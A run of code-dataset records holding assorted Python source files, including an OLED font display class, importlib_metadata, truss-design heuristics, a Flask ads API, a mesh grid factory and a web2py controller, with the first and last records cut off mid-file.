orig)\n","sub_path":"i2p.py","file_name":"i2p.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
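A minimal driver sketch for the i2p helpers above (hypothetical folder name; assumes the file is importable as i2p and that a directory of page images sits next to the script, which is the layout the functions expect):\n\nimport os\nfrom i2p import i2pconverterAutoCrop\n\nfolder = "scans"                     # hypothetical layout: scans/page01.png, scans/page02.png, ...\nfiles = os.listdir(folder)           # passed through, but the 'files' argument is unused by the helper\ni2pconverterAutoCrop(files, folder)  # deskews/thresholds each page, then writes scans.pdf via img2pdf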
+{"seq_id":"570452706","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport Adafruit_SSD1306\nfrom PIL import Image, ImageDraw, ImageFont\n#import textwrap\nimport mojimoji\nimport unicodedata\nimport time\n\nfrom ipaddr import ipaddr\n\n# $ wget http://www.geocities.jp/littlimi/arc/misaki/misaki_ttf_2015-04-10.zip\nFONT_PATH = '/home/pi/font/misakifont/misaki_gothic.ttf'\n\nclass MisakiFont:\n def __init__(self, zenkaku=False, fontsize=8, rst=24):\n self.zenkaku_flag = zenkaku\n self.fontsize = fontsize\n self.rst = rst\n\n self.str = []\n self.char_width = self.fontsize\n self.char_height = self.fontsize\n self.cur_row = 0\n self.enable = True\n\n # initialize display\n self.disp = Adafruit_SSD1306.SSD1306_128_64(rst=self.rst)\n #self.disp = Adafruit_SSD1306.SSD1306_96_16(rst=self.rst)\n try:\n self.disp.begin()\n except:\n self.enable = False\n return\n self.disp.clear()\n self.disp.display()\n\n # load font\n self.font = ImageFont.truetype(FONT_PATH, self.fontsize, encoding='unic')\n (self.char_width, self.char_height) = self.font.getsize('8')\n self.char_height += 1\n \n # cols and rows\n self.cols = int(self.disp.width / self.char_width)\n self.rows = int(self.disp.height / self.char_height)\n for i in range(self.rows):\n self.str.append(\"\")\n\n # Create blank image for drawing.\n # Make sure to create image with mode '1' for 1-bit color.\n self.image = Image.new('1', (self.disp.width, self.disp.height))\n\n # Get drawing object to draw on image.\n self.draw = ImageDraw.Draw(self.image)\n \n # Draw a black filled box to clear the image.\n self.draw.rectangle((0,0,self.disp.width,self.disp.height), outline=0, fill=0)\n\n\n def clear(self):\n if not self.enable:\n return\n self.draw.rectangle((0,0,self.disp.width,self.disp.height), outline=0, fill=0)\n self.disp.image(self.image)\n self.disp.display()\n self.cur_row = 0\n for i in range(self.rows):\n self.str[i] = ''\n\n def set_zenkaku_flag(self, value):\n if value:\n self.zenkaku_flag = True\n else:\n self.zenkaku_flag = False\n \n def _draw1line(self, col, row, str):\n if not self.enable:\n return\n x = col * self.char_width\n y = row * self.char_height\n self.draw.text((x,y), str, font=self.font, fill=255)\n\n def println1(self, str):\n if not self.enable:\n return\n self.str[self.cur_row] = str\n self.draw.rectangle((0,0,self.disp.width,self.disp.height), outline=0, fill=0)\n for r in range(self.rows):\n self._draw1line(0, r, self.str[r])\n self.disp.image(self.image)\n self.disp.display()\n self.cur_row += 1\n if self.cur_row > self.rows - 1:\n self.cur_row = self.rows - 1\n self.str.pop(0)\n self.str.append('')\n\n def println(self, s):\n if not self.enable:\n return\n if len(s) == 0:\n self.println1('')\n return\n if self.zenkaku_flag:\n s = mojimoji.han_to_zen(s)\n line = ''\n prev_len = 0\n cur_len = 0\n for ch in s:\n# print(ch)\n prev_len = cur_len\n if unicodedata.east_asian_width(ch) in 'FWA':\n cur_len += 1\n else:\n cur_len += 0.5\n# print(cur_len)\n# print(line)\n if cur_len <= self.cols:\n line += ch\n else:\n #print(prev_len, end='')\n #print(' ' + line)\n self.println1(line)\n line = ch\n cur_len -= prev_len\n if cur_len > 0:\n #print(cur_len, end='')\n #print(' ' + line)\n self.println1(line)\n \n\nif __name__ == '__main__':\n misakifont = MisakiFont()\n print('font ' + str(misakifont.fontsize))\n print('char ' + str(misakifont.char_width) + 'x' + str(misakifont.char_height))\n print('disp ' + str(misakifont.cols) + 'x' + str(misakifont.rows))\n\n 
misakifont.println('ABCあいうえお0123456789ガギグゲゴガギグゲゴABCあいうえお0123456789ガギグゲゴガギグゲゴ')\n misakifont.println('font:' +\n str(misakifont.fontsize) + ', ' +\n str(misakifont.char_width) + ' x ' +\n str(misakifont.char_height) + ' pixels')\n misakifont.println(str(misakifont.cols) + ' cols ' +\n str(misakifont.rows) + ' rows')\n misakifont.set_zenkaku_flag(True)\n misakifont.println(time.strftime('%Y/%m/%d(%a)'))\n misakifont.println(time.strftime('%H:%M:%S'))\n misakifont.println(ipaddr().ip_addr())\n","sub_path":"MisakiFont/MisakiFont.py","file_name":"MisakiFont.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"450585034","text":"import sys\n\nfrom .api import Distribution, PackageNotFoundError # noqa: F401\nfrom importlib import import_module\n\nfrom . import _common\nfrom ._common import entry_points\n\n__all__ = [\n 'distribution',\n 'entry_points',\n 'resolve',\n 'version',\n ]\n\n\ndef distribution(package):\n \"\"\"Get the ``Distribution`` instance for the given package.\n\n :param package: The module object for the package or the name of the\n package as a string.\n :return: A ``Distribution`` instance (or subclass thereof).\n \"\"\"\n return Distribution.from_name(package)\n\n\ndef version(package):\n \"\"\"Get the version string for the named package.\n\n :param package: The module object for the package or the name of the\n package as a string.\n :return: The version string for the package as defined in the package's\n \"Version\" metadata key.\n \"\"\"\n return distribution(package).version\n\n\ndef resolve(entry_point):\n \"\"\"Resolve an entry point string into the named callable.\n\n :param entry_point: An entry point string of the form\n `path.to.module:callable`.\n :return: The actual callable object `path.to.module.callable`\n :raises ValueError: When `entry_point` doesn't have the proper format.\n \"\"\"\n path, colon, name = entry_point.rpartition(':')\n if colon != ':':\n raise ValueError('Not an entry point: {}'.format(entry_point))\n module = import_module(path)\n return getattr(module, name)\n\n\ndef _install():\n \"\"\"Install the appropriate sys.meta_path finder for the Python version.\"\"\"\n sys.meta_path.append(_common.MetadataPathFinder)\n sys.meta_path.append(_common.WheelMetadataFinder)\n\n\n_install()\n\n__version__ = version(__name__)\n","sub_path":"venv/lib/python3.7/site-packages/importlib_metadata/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"449191836","text":"import numpy as np\nimport networkx as nx\n\n__all__ = ['findLineSegIntersection', 'findOrientation', 'feasibility', 'stability', 'orientation', 'triangles', 'density', 'threeStars', 'createGraph']\n\ndef findLineSegIntersection(p1,q1,p2,q2):\n# This boolean function determines whether two line segments intersect,\n# given their endpoints as inputs\n\tif (findOrientation(p1,q1,p2) != findOrientation(p1,q1,q2)) and (findOrientation(p2,q2,p1) != findOrientation(p2,q2,q1)):\n\t\tif np.all(np.isclose(p1,p2)) or np.all(np.isclose(q1,q2)) or np.all(np.isclose(p1,q2)) or np.all(np.isclose(q1,p2)):\n\t\t\tintersect = False; \n\t\telse:\n\t\t\tintersect = True;\n\telse:\n\t\tintersect = False;\n\t\n\treturn intersect\n\ndef findSlope(x1, y1, x2, y2):\n\tden = x2-x1\n\tnum = y2-y1\n\tm = num/den if den!=0 else 1000;\n\treturn m\n\ndef findAngles(NC, CA):\n# This function computes 
the orientation angle wrt x-axis for elements in CA\n# Inputs: nodal position matrix NC \n# Design Connectivity Array CA_des \n\tx1 = NC[CA[:,0],0]\n\ty1 = NC[CA[:,0],1]\n\tx2 = NC[CA[:,1],0]\n\ty2= NC[CA[:,1],1]\n\n\tL = np.sqrt((x2-x1)**2+(y2-y1)**2);\n\tangles = np.arccos((x2-x1)/L);\n\n\treturn angles\n\ndef createGraph(NC, CA):\n\tG = nx.Graph()\n\tG.add_nodes_from(range(9))\n\tG.add_edges_from(CA)\n\treturn G\n\ndef triangles(NC, CA):\n# This function returns the number of triangles in the design\n\tG = createGraph(NC, CA)\n\treturn sum(nx.triangles(G).values())/3\n\ndef density(NC, CA):\n\tG = createGraph(NC, CA)\n\treturn nx.density(G)\n\ndef threeStars(NC, CA):\n\tG = createGraph(NC, CA)\n\tstars = np.array(list(dict(nx.degree(G)).values()))\n\treturn sum(stars==3)\n\ndef orientation(NC, CA, target=[0, 20]):\n# This function returns the number of elements with orientation between the given range\n# Inputs: nodal position matrix NC \n# Design Connectivity Array CA_des\n#\t\t End angles in degrees range = [deg deg]; Angles should be between [0, 180] degrees\n\tc= np.pi/180\n\tangles = findAngles(NC, CA)\n\treturn sum((angles>=c*target[0]) & (angles<=c*target[1]))\n\ndef findOrientation(p,q,r):\n# This function finds the orientation of an ordered triplet (p, q, r)\n# The function returns one of three following values:\n# 0 --> p, q and r are colinear \n# 1 --> Clockwise \n# 2 --> Counterclockwise \n\tval = (q[1]-p[1])*(r[0]-q[0])-(q[0]-p[0])*(r[1]-q[1]);\n\tif val == 0:\n\t\torientation = 0;\n\telif val > 0:\n\t\torientation = 1;\n\telse:\n\t\torientation = 2;\n\t\n\treturn orientation\n\ndef feasibility(NC,CA_des):\n# This function computes the feasibility score for a design \n# Inputs: nodal position matrix NC \n# Design Connectivity Array CA_des \n\tfeasibilityScore = 1;\n\n\t# FIRST CONSTRAINT: members only intersect at nodes (no crossing)\n\t# Sort points from left to right by x-position\n\tSortedCA = CA_des[np.argsort(CA_des, axis=0)[:,0]]\n\t\n\t# Develop 4xM matrix of line segment endpoint coordinates, where M is \n\t# the number of truss members. 
Each row of format (x1,y1,x2,y2),\n\t# where point 1 is leftmost, point 2 is rightmost\n\tPosA = np.vstack([ NC[SortedCA[:,0],0], NC[SortedCA[:,0],1], NC[SortedCA[:,1],0], NC[SortedCA[:,1],1] ]).T;\n\n\t# Loop through each pair of elements\n\tfor i in range(PosA.shape[0]):\n\t\tfor j in range(PosA.shape[0]):\n\t\t\tif i==j:\n\t\t\t\tcontinue\n\t\t\t# Determine whether the given pair of elements intersects\n\t\t\tintersect = findLineSegIntersection([PosA[i,0],PosA[i,1]],[PosA[i,2],PosA[i,3]],[PosA[j,0],PosA[j,1]],[PosA[j,2],PosA[j,3]]);\n\t\t\t# Throw an error, given an intersection\n\t\t\tif intersect == True:\n\t\t\t\tfeasibilityScore = feasibilityScore - 0.05;\n\t\t\t\tif feasibilityScore < 0.05:\n\t\t\t\t\treturn feasibilityScore\n\t\t\t\t#{\n\t\t\t\t# print(i, j)\n\t\t\t\tD = ['The element from ('+str(PosA[i,0])+','+\n\t\t\t\t\t str(PosA[i,1])+') to ('+str(PosA[i,2])+\n\t\t\t\t\t ','+str(PosA[i,3])+') intersects with the' +\n\t\t\t\t\t ' element from (',str(PosA[j,0])+',' +\n\t\t\t\t\t str(PosA[j,1])+') to (',str(PosA[j,2])+','+\n\t\t\t\t\t str(PosA[j,3])+')'];\n\t\t\t\t# print(D);\n\t\t\t\t#}\n\t\t\t\t\n\t\t# This constraint is not included in this version because the definition of edges does not allow overallping.\n\t# SECOND CONSTRAINT: Elements (of either the same or different lengths) \n\t# cannot overlap\n\t# Loop through each element\n\t# for k in range(SortedCA.shape[0]):\n\t# \t# Loop through each element again, to consider each possible pair \n\t# \t# of elements\n\t# \tmk = findSlope(NC[SortedCA[k,0],0], NC[SortedCA[k,0],1], NC[SortedCA[k,1],0], NC[SortedCA[k,1],1]);\n\n\t# \tfor q in range(SortedCA.shape[0]):\n\t# \t\t# If the same element is being compared twice, move on\n\t# \t\tif k == q:\n\t# \t\t\tcontinue\n\n\t# \t\t# Check if both elements share a common startpoint\n\t# \t\tif (NC[SortedCA[k,0],0] == NC[SortedCA[q,0],0]) and (NC[SortedCA[k,0],1] == NC[SortedCA[q,0],1]):\n\t# \t\t\t# Check if both elements have the same slope (and reject \n\t# \t\t\t# the design if so)\n\t# \t\t\tmq = findSlope(NC[SortedCA[q,0],0], NC[SortedCA[q,0],1], NC[SortedCA[q,1],0], NC[SortedCA[q,1],1]);\n\t\t\t\t\n\t# \t\t\tif mk == mq:\n\t# \t\t\t feasibilityScore = feasibilityScore - 0.1;\n\t# \t\t\t if feasibilityScore < 0.1:\n\t# \t\t\t\t return feasibilityScore\n\t\t\t\t \n\t# \t\t\t #{\n\t# \t\t\t D = ['The element from ('+str(PosA[k,0])+','+\n\t# \t\t\t\t str(PosA[k,1])+') to ('+str(PosA[k,2])+\n\t# \t\t\t\t ','+str(PosA[k,3])+') overlaps with the'+\n\t# \t\t\t\t ' element from ('+str(PosA[q,0])+','+\n\t# \t\t\t\t str(PosA[q,1])+') to ('+str(PosA[q,2])+','+\n\t# \t\t\t\t str(PosA[q,3])+')'];\n\t\t\t\t # print(D);\n\t\t\t\t #}\n\n\t# THIRD CONSTRAINT: Metamaterial should be connected.\n\t# The bottom layer and the top layer should be connected at at least one node.\n\t# Left layer and right layer should be connected at at least one node\n\tG = createGraph(NC, SortedCA)\n\tconnected_components = list(nx.connected_components(G))\n\thorz_connecting_nodes = [[0,6], [1,7], [2,8]]\n\tvert_connecting_nodes = [[0,2], [3,5], [6,8]]\n\tdiag_connecting_nodes = [[[1,5], [3,7]], [[1,3], [5,7]], [[0,8],[0,8]], [[2,6],[2,6]]]\n\n\thorz_bool = []\n\tvert_bool = []\n\tdiag_bool = []\n\n\tfor g in connected_components:\n\t\tg = list(g)\n\t\thorz_bool.append(np.any(np.all(np.isin(horz_connecting_nodes, g), axis=1)))\n\t\tvert_bool.append(np.any(np.all(np.isin(vert_connecting_nodes, g), axis=1)))\n\t\tdiag_bool.append(np.all(np.isin(diag_connecting_nodes, g), axis=-1))\n\n\thorz_bool = 
np.array(horz_bool)\n\tvert_bool = np.array(vert_bool)\n\tdiag_bool = np.all(np.any(np.array(diag_bool), axis=0), axis=-1)\n\n\t# diagonal_connecting_nodes = [[[1,5], [3, 7]], [[1,3], [5,7]]]\n\t# connecting_diagonal_pair_present = any([ all(ls in SortedCA.tolist() for ls in lists) for lists in diagonal_connecting_nodes])\n\n\tif sum([np.any(diag_bool), np.any(horz_bool), np.any(vert_bool)])<2:\n\t\tif np.all(~horz_bool):\n\t\t\tfeasibilityScore = feasibilityScore - 0.1;\n\t\t\tif feasibilityScore < 0.1:\n\t\t\t\treturn feasibilityScore\n\t\tif np.all(~vert_bool):\n\t\t\tfeasibilityScore = feasibilityScore - 0.1;\n\t\t\tif feasibilityScore < 0.1:\n\t\t\t\treturn feasibilityScore\n\n\treturn np.around(feasibilityScore,2)\n\n# FUNCTION TO TEST 2D TRUSS STABILITY \ndef stability(sidenum,CA,NC):\n\t# Initialize stability score\n\tstabilityScore = 1;\n\n\t# Add up counters based on nodal connectivities\n\tN,_ = np.histogram(CA, NC.shape[0]);\n\t\n\t# First stability check: number of \"holes\" (unconnected nodes) in truss\n\t# should be less than or equal to [(number of side nodes) - 2]\n\tzeros = np.argwhere(N==0);\n\tif len(zeros) > (sidenum-2):\n\t\tstabilityScore = stabilityScore - 0.1;\n\t\tif stabilityScore < 0.1:\n\t\t\treturn stabilityScore\n\t\n\t# Second stability check: nodes with connections are connected to at\n\t# least three other nodes apiece (except for the corner nodes)\n\tidx = np.r_[1:(sidenum-2), sidenum:(sidenum**2-sidenum-1), (sidenum**2-(sidenum-2)-1):(sidenum**2-2)]\n\tNs = N[idx];\n\tNnz = Ns[Ns>0];\n\tfor a in range(len(Nnz)):\n\t if (Nnz[a] == 1) or (Nnz[a] == 2):\n\t\t stabilityScore = stabilityScore - 0.1;\n\t\t if stabilityScore < 0.1:\n\t\t\t return stabilityScore\n\t\n\t# Third stability check: corner nodes have at least two connections\n\tNc = N[[0, sidenum-1, sidenum**2-sidenum-1, sidenum**2-1]];\n\tfor a in range(len(Nc)):\n\t if Nc[a] == 1:\n\t\t stabilityScore = stabilityScore - 0.2;\n\t\t if stabilityScore < 0.1:\n\t\t\t return stabilityScore;\n\t\n\t# Fourth stability check: at least one diagonal member present\n\tnodiags = True;\n\tfor i in range(CA.shape[0]):\n\t\tif CA[i,0]+sidenum == CA[i,1]:\n\t\t\tnodiags = True;\n\t\telif CA[i,0]-sidenum == CA[i,1]:\n\t\t\tnodiags = True;\n\t\telif CA[i,0]+1 == CA[i,1]:\n\t\t\tnodiags = True;\n\t\telif CA[i,0]-1 == CA[i,1]:\n\t\t\tnodiags = True;\n\t\telse:\n\t\t\tnodiags = False;\n\t\t\tbreak\n\t\t\n\tif nodiags == True:\n\t\tstabilityScore = stabilityScore - 0.2;\n\t\tif stabilityScore < 0.1:\n\t\t\treturn stabilityScore\n\t\n\t# Assign value to stability boolean\n\t#stabilityBool = true;\n\t#if stabilityScore < 1\n\t\t#stabilityBool = false;\n\t#end\n\treturn np.around(stabilityScore,2)","sub_path":"_static/design_evaluator/python/old/heuristics_updated.py","file_name":"heuristics_updated.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"450980511","text":"from datetime import datetime\nfrom flask import Blueprint, jsonify, request\nfrom flask.views import MethodView\n\nfrom database import db\nfrom src.services.ads import AdsService, AdDoesNotExists\nfrom src.services.cars import CarsService, CarDoesNotExists\nfrom src.services.colors import ColorService\nfrom src.services.image import ImageService\nfrom src.services.tags import TagsService\nfrom src.tools import auth_required, seller_required, owner_required\n\nbp = Blueprint('ads', __name__)\n\n\ndef generation_ad_dict(ad_id: int) -> dict:\n \"\"\"Build the dictionary representation of an ad\"\"\"
\n with db.connection as connection:\n ad_service = AdsService(connection)\n response = ad_service.read_ad(ad_id)\n\n car_service = CarsService(connection)\n response[\"car\"] = car_service.read_car(ad_id=ad_id)\n\n color_service = ColorService(connection)\n response[\"car\"][\"color\"] = color_service.read_all_color(ad_id=ad_id)\n\n image_service = ImageService(connection)\n response[\"car\"][\"images\"] = image_service.read_image(ad_id=ad_id)\n\n tags_service = TagsService(connection)\n response[\"tags\"] = tags_service.read_tag(ad_id=ad_id)\n return response\n\n\nclass AdsView(MethodView):\n def get(self):\n \"\"\"Get the list of ads\"\"\"\n query_seller_id = request.args.get(\"seller_id\")\n query_tags = request.args.get(\"tags\")\n query_make = request.args.get(\"make\")\n query_model = request.args.get(\"model\")\n\n with db.connection as connection:\n ad_service = AdsService(connection)\n asd_id = ad_service.generation_id(seller_id=query_seller_id)\n\n ads = [generation_ad_dict(ad_id) for ad_id in asd_id]\n\n if query_make is not None:\n ads = list(filter(lambda x: x[\"car\"][\"make\"] == query_make, ads))\n\n if query_model is not None:\n ads = list(filter(lambda x: x[\"car\"][\"model\"] == query_model, ads))\n\n if query_tags is not None:\n query_tags = [tag.strip() for tag in query_tags.split(',')]\n ads = [\n ad\n for ad in ads\n for tag in ad[\"tags\"]\n if tag in query_tags\n ]\n\n return jsonify(ads)\n\n @auth_required\n @seller_required\n def post(self, user):\n \"\"\"Create a new ad\"\"\"\n request_json = request.json\n\n seller_id = user[\"seller_id\"]\n title = request_json.get('title')\n data = datetime.now().strftime(\"%A, %d. %B %Y %I:%M%p\")\n tags = request_json.get(\"tags\")\n car = request_json.get(\"car\")\n colors = car.get(\"color\")\n image = car.get(\"image\")\n\n with db.connection as connection:\n\n car_service = CarsService(connection)\n car_id = car_service.create(car)\n\n color_service = ColorService(connection)\n for color in colors:\n color_service.add_to_car_color(color, car_id)\n\n image_service = ImageService(connection)\n for image_data in image:\n image_service.update_image(image_data, car_id)\n\n ads_service = AdsService(connection)\n ad_id = ads_service.create_ad(seller_id, car_id, title, data)\n\n tag_service = TagsService(connection)\n for tag in tags:\n tag_service.add_to_ad(tag, ad_id)\n\n return jsonify(generation_ad_dict(ad_id)), 201\n\n\nclass AdView(MethodView):\n def get(self, ad_id):\n \"\"\"Get the ad with the given id\"\"\"\n try:\n response = generation_ad_dict(ad_id)\n except AdDoesNotExists:\n return '', 404\n return jsonify(response)\n\n @auth_required\n @seller_required\n @owner_required\n def delete(self, ad_id, user):\n \"\"\"Delete the ad with the given id\"\"\"\n with db.connection as connection:\n as_service = AdsService(connection)\n\n try:\n as_service.read_ad(ad_id)\n except AdDoesNotExists:\n pass\n else:\n as_service.delete_ad(ad_id)\n\n return '', 200\n\n @auth_required\n @seller_required\n @owner_required\n def patch(self, ad_id, user):\n \"\"\"Partially edit the ad with the given id\"\"\"\n request_json = request.json\n car_data = request_json.get(\"car\")\n\n with db.connection as connection:\n\n title = request_json.get(\"title\")\n if title is not None:\n as_service = AdsService(connection)\n as_service.update_ad(ad_id=ad_id, titile=title)\n\n tags = request_json[\"tags\"]\n tags_service = TagsService(connection)\n for tag in tags:\n
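 # note: this loop only appends tags; a PATCH never removes an ad's existing tags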
tags_service.add_to_ad(tag, ad_id)\n\n car_service = CarsService(connection)\n car_id = car_service.get_id(ad_id=ad_id)\n try:\n car_service.update(car_id=car_id, data=car_data)\n except CarDoesNotExists:\n car_service.create(car_data)\n\n colors = car_data.get(\"colors\")\n car_service = ColorService(connection)\n for color in colors:\n car_service.add_to_car_color(color, car_id)\n\n images = car_data.get(\"images\")\n image_service = ImageService(connection)\n for image in images:\n image_service.update_image(image, car_id)\n\n return '', 204\n\n\nbp.add_url_rule('', view_func=AdsView.as_view('ads'))\nbp.add_url_rule('/<int:ad_id>', view_func=AdView.as_view('ad'))\n","sub_path":"Lesson 13/final v 2.0/src/blueprints/ads.py","file_name":"ads.py","file_ext":"py","file_size_in_byte":5760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"140588100","text":"\"\"\"\nCreated at 22.08.2019\n\n@author: Michał Jureczka\n@author: Piotr Bartman\n\"\"\"\n\nimport numpy as np\nfrom simulation.grid import Grid\n\n\nclass GridFactory:\n @staticmethod\n def addPoint(grid, x, y, t):\n i = 0\n while i < len(grid.Points):\n if grid.Points[i][0] == x and grid.Points[i][1] == y:\n return\n else:\n i += 1\n grid.Points = np.append([[x, y, t]], grid.Points, axis=0)\n for i in range(0, len(grid.Edges)):\n grid.Edges[i][0] += 1\n grid.Edges[i][1] += 1\n\n @staticmethod\n def addEdge(grid, i, j, t): # always orders (i, j) so that i < j on x, or, for equal x, i < j on y\n a = i\n b = j\n if (grid.Points[j][0] < grid.Points[i][0] or\n (grid.Points[j][0] == grid.Points[i][0] and grid.Points[j][1] < grid.Points[i][1])):\n a = j\n b = i\n grid.Edges = np.append([[a, b, t]], grid.Edges, axis=0)\n\n @staticmethod\n def startBorder(grid, x, y):\n GridFactory.addPoint(grid, x, y, 0)\n\n @staticmethod\n def addBorderD(grid, x, y):\n GridFactory.addPoint(grid, x, y, 1)\n GridFactory.addEdge(grid, 1, 0, 2)\n grid.BorderEdgesD += 1\n\n @staticmethod\n def addBorderDLast(grid, x, y):\n GridFactory.addPoint(grid, x, y, 2)\n GridFactory.addEdge(grid, 1, 0, 2)\n grid.BorderEdgesD += 1\n\n @staticmethod\n def addBorderNTop(grid, x, y):\n GridFactory.addPoint(grid, x, y, 3)\n GridFactory.addEdge(grid, 1, 0, 1)\n grid.BorderEdgesN += 1\n\n @staticmethod\n def addBorderNTopLast(grid, x, y):\n GridFactory.addPoint(grid, x, y, 4)\n GridFactory.addEdge(grid, 1, 0, 1)\n grid.BorderEdgesN += 1\n\n @staticmethod\n def addBorderNSide(grid, x, y):\n GridFactory.addPoint(grid, x, y, 5)\n GridFactory.addEdge(grid, 0, 1, 2)\n grid.BorderEdgesN += 1\n\n @staticmethod\n def addBorderNSideLast(grid, x, y):\n GridFactory.addPoint(grid, x, y, 6)\n GridFactory.addEdge(grid, 0, 1, 2)\n grid.BorderEdgesN += 1\n\n @staticmethod\n def addBorderC(grid, x, y):\n GridFactory.addPoint(grid, x, y, 7)\n GridFactory.addEdge(grid, 0, 1, 1)\n grid.BorderEdgesC += 1\n\n @staticmethod\n def stopBorder(grid):\n GridFactory.addEdge(grid, len(grid.Points) - 1, 0, 1)\n grid.BorderEdgesC += 1\n\n @staticmethod\n def construct(sizeH, sizeL, height):\n grid = Grid()\n grid.SizeH = sizeH\n grid.SizeL = sizeL\n grid.Height = height\n grid.longTriangleSide = float(height) / sizeH\n grid.Length = grid.longTriangleSide * sizeL\n\n grid.halfLongTriangleSide = float(grid.longTriangleSide) * 0.5\n grid.shortTriangleSide = float(grid.longTriangleSide) * np.sqrt(2) * 0.5\n grid.halfShortTriangleSide = float(grid.shortTriangleSide) * 0.5\n grid.TriangleArea = (grid.longTriangleSide * grid.longTriangleSide) / 4.\n\n GridFactory.startBorder(grid, 0, 
0)\n\n for i in range(1, sizeH):\n GridFactory.addBorderD(grid, 0, float(i) * grid.longTriangleSide)\n GridFactory.addBorderDLast(grid, 0, float(sizeH) * grid.longTriangleSide)\n\n for i in range(1, sizeL):\n GridFactory.addBorderNTop(grid, float(i) * grid.longTriangleSide, height)\n GridFactory.addBorderNTopLast(grid, float(sizeL) * grid.longTriangleSide, height)\n\n for i in range(sizeH - 1, 0, -1):\n GridFactory.addBorderNSide(grid, grid.Length, float(i) * grid.longTriangleSide)\n GridFactory.addBorderNSideLast(grid, grid.Length, float(0))\n\n for i in range(sizeL - 1, 0, -1):\n GridFactory.addBorderC(grid, float(i) * grid.longTriangleSide, 0)\n\n GridFactory.stopBorder(grid)\n\n for i in range(0, sizeL):\n for j in range(1, sizeH):\n x1 = float(i) * grid.longTriangleSide\n x2 = float(i + 1) * float(grid.longTriangleSide)\n y = float(j) * grid.longTriangleSide\n GridFactory.addPoint(grid, x1, y, 8)\n GridFactory.addPoint(grid, x2, y, 8)\n a = grid.getPoint(x1, y)\n b = grid.getPoint(x2, y)\n GridFactory.addEdge(grid, a, b, 1)\n\n for i in range(1, sizeL):\n for j in range(0, sizeH):\n x = float(i) * grid.longTriangleSide\n y1 = float(j) * grid.longTriangleSide\n y2 = float(j + 1) * grid.longTriangleSide\n GridFactory.addPoint(grid, x, y1, 8)\n GridFactory.addPoint(grid, x, y2, 8)\n a = grid.getPoint(x, y1)\n b = grid.getPoint(x, y2)\n GridFactory.addEdge(grid, a, b, 2)\n\n for i in range(0, sizeL):\n for j in range(0, sizeH):\n x = (float(i) + 0.5) * grid.longTriangleSide\n y = (float(j) + 0.5) * grid.longTriangleSide\n GridFactory.addPoint(grid, x, y, 9)\n a = grid.getPoint(x, y)\n b = grid.getPoint((float(i)) * grid.longTriangleSide, (float(j) + 1.0) * grid.longTriangleSide)\n GridFactory.addEdge(grid, a, b, 5)\n b = grid.getPoint((float(i) + 1.0) * grid.longTriangleSide, (float(j) + 1.0) * grid.longTriangleSide)\n GridFactory.addEdge(grid, a, b, 4)\n b = grid.getPoint((float(i) + 1.0) * grid.longTriangleSide, (float(j)) * grid.longTriangleSide)\n GridFactory.addEdge(grid, a, b, 6)\n b = grid.getPoint((float(i)) * grid.longTriangleSide, (float(j)) * grid.longTriangleSide)\n GridFactory.addEdge(grid, a, b, 3)\n\n return grid\n","sub_path":"simulation/grid_factory.py","file_name":"grid_factory.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"634255102","text":"class point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return \"%s %s\" % (self.x, self.y)\n\n def __lt__(self, other):\n if self.x == other.x:\n return self.y <= other.y\n else:\n return self.x <= other.x\n\ninput_count = int(input())\ninput_points = list()\n\nfor index in range(0, input_count):\n input_list = [int(x) for x in input().split()]\n input_points.append(point(input_list[0], input_list[1]))\n\ninput_points.sort()\n\nfor input_point in input_points:\n print(input_point)\n","sub_path":"python3 풀이/좌표정렬하기/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"69942196","text":"# -*- coding: utf-8 -*-\nif 0:\n from gluon.globals import *\n from gluon.html import *\n from gluon.http import *\n from gluon.tools import Auth\n from gluon.sqlhtml import SQLFORM, SQLTABLE, form_factory\n session = Session()\n request = Request()\n response = Response()\n\n### required - do not delete\ndef user(): return dict(form=auth())\ndef download(): return 
response.download(request,db)\ndef call(): return service()\n### end requires\n\n\n\ndef index():\n return dict()\n\ndef error():\n return dict()\n\n@auth.requires_login()\ndef cliente():\n # presentacion de listado de clientes\n datasource = db(db.cliente.id>0).select()\n powerTable = plugins.powerTable\n powerTable.datasource = datasource\n powerTable.headers = 'labels'\n powerTable.showkeycolumn = False\n powerTable.dtfeatures['bJQueryUI'] = request.vars.get('jqueryui',True)\n powerTable.uitheme = request.vars.get('theme','Smoothness')\n powerTable.dtfeatures[\"sScrollY\"] = \"100%\"\n powerTable.dtfeatures[\"sScrollX\"] = \"100%\"\n powerTable.dtfeatures['sPaginationType'] = 'full_numbers'\n powerTable.dtfeatures[\"iDisplayLength\"] = 20\n # alta de clientes \n mystep = [dict(title='NUEVO CLIENTE',Legend='Ingrese los datos del nuevo cliente',\n fields=['empresa','contacto','telefono','correo'])]\n from plugin_PowerFormWizard import PowerFormWizard\n options = {'description':False,'legend':True,'validate':True}\n form = PowerFormWizard(db.cliente, steps=mystep, options=options)\n \n if form.accepts(request.vars, session):\n response.flash = \"registro aceptado\"\n elif form.errors:\n form.step_validation()\n response.flash = \"error en los datos\"\n return dict( table=powerTable.create(),form=form) \n \n@auth.requires_login()\ndef categoria():\n # presentacion de categorias de articulosss\n datasource = db(db.categoria.id>0).select()\n powerTable = plugins.powerTable\n powerTable.datasource = datasource\n powerTable.headers = 'labels'\n powerTable.showkeycolumn = False\n powerTable.dtfeatures['bJQueryUI'] = request.vars.get('jqueryui',True)\n powerTable.uitheme = request.vars.get('theme','Smoothness')\n powerTable.dtfeatures[\"sScrollY\"] = \"100%\"\n powerTable.dtfeatures[\"sScrollX\"] = \"100%\"\n powerTable.dtfeatures['sPaginationType'] = 'full_numbers'\n powerTable.dtfeatures[\"iDisplayLength\"] = 30\n # alta 